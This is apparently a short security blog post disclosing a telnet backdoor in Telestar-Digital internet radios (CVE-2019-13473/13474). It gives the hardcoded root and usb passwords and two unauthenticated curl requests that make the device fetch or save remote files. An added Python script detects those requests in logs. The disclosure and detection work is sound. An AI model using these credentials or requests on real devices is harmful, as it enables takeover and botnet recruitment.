An undocumented telnet backdoor was found in a popular radio player
Summary:
The German technology company Telestar-Digital is a
popular producer of Internet radios.
A backdoor was found and exploited in the devices by using
the open source tools nmap and ncrack.
The vulnerabilities have been assigned CVE-2019-13473 and CVE-2019-13474.
Proof of concept
The default usernames and passwords were:
- root / password
- usb / winbond
The system runs an embedded Linux kernel, which is very common among IoT devices.
OS (toolchain and ELF section strings found in the firmware binary):
CC: (GNU) 3.3.2 20031005 (Debian prerelease)
GCC: (GNU) 4.2.1 GCC: (GNU) 4.2.1 GCC: (GNU) 4.2.1 GCC: (GNU) 4.2.1 GCC: (GNU) 4.2.1
GCC: (GNU) 3.3.2 20031005 (Debian prerelease)
Aaeabi .shstrtab .init .text .fini .rodata .ARM.extab .ARM.exidx .eh_frame .init_array .fini_array .jcr .data.rel.ro .got .data .bss .comment .ARM.attributes
Several actions can be performed without authentication:
Change the logo:
curl -XGET http://iphere/mylogo?url=http://example.com/own.jpg
Download a file:
curl -XGET 'http://iphere/LocalPlay?url=http://example.com/msg.wav&save=1'
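The two unauthenticated endpoints above are easy to spot in traffic captured in front of such a device. The following is an added detection example, not code from the original post or from the vendor: it parses constructed combined-format access-log lines (assumed format, sample values are made up) and flags requests to /mylogo or /LocalPlay that pull content from a remote URL, distinguishing the save=1 case that writes a file to the device.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in combined-log style (not from the post).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2019:10:01:02 +0000] "GET /mylogo?url=http://203.0.113.7/own.jpg HTTP/1.1" 200 17
10.0.0.5 - - [12/Aug/2019:10:01:05 +0000] "GET /LocalPlay?url=http://203.0.113.7/msg.wav&save=1 HTTP/1.1" 200 17
10.0.0.9 - - [12/Aug/2019:10:02:00 +0000] "GET /LocalPlay?url=http://203.0.113.7/song.wav HTTP/1.1" 200 17
10.0.0.9 - - [12/Aug/2019:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

# Minimal combined-log parser: source address, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return a finding for a request target that hits one of the radio's
    unauthenticated endpoints with a remote URL, or None if it looks benign."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    urls = qs.get("url", [])
    remote = any(urlsplit(u).scheme in ("http", "https") for u in urls)
    if parts.path == "/mylogo" and remote:
        return "logo replaced from remote URL"
    if parts.path == "/LocalPlay" and remote:
        if qs.get("save", ["0"])[0] == "1":
            return "remote file fetched and saved to device"
        return "remote file played without authentication"
    return None


def scan_log(text):
    """Scan log text and return (source, target, reason) tuples for flagged requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        reason = classify_request(m["target"])
        if reason:
            findings.append((m["src"], m["target"], reason))
    return findings


if __name__ == "__main__":
    for src, target, reason in scan_log(SAMPLE_LOG):
        print(f"{src} {target} -> {reason}")
```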
This vulnerability and backdoor are most likely to be used in larger automated
attacks such as the Mirai botnet.
External links:
- Telestar.de
- Vulnerability labs article
- Mirai botnet cloudflare
- Mirai botnet wikipedia
This blog post is part of the Exploit of the Day series,
in which we write short descriptions of interesting
exploits that we index.